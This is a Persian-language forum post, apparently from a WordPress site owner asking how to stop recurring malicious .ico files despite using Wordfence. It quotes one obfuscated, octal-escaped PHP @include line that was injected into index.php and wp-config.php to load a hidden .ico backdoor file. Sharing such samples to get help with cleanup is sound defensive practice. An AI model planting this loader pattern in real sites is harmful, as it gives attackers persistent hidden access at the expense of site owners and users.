متاسفانه مدت یک هته هست یک فایل با پسوند ico در پوشه های مختلف ساخته میشه بر روی سایت از افزونه Wordfence استفاده میکنم.
فایل های بر روی wp-config.php و index.php یک کد میسازه که زیر به صورت نمونه ارسال میکنم. ادرس wp-login.php رو هم عوض کردم. از سایت https://malwaredecoder.com/ برای پیدا کردن ادرس فایل مخرب استفاده میکنم که دقیقا مسیر فایل رو بهم میده. چطوری میتونم جلوی این حمله رو بگیرم.
نمونه فایل ایجاد شده در index.php و wp-config.php
@include "\057home\057gila\162o/do\155ains\057gila\162o.co\155/pri\166ate_\150tml/\167p-ad\155in/.\146e3a2\07096.i\143o";
نام نمونه فایل های متغیر
.fe3a2896.ico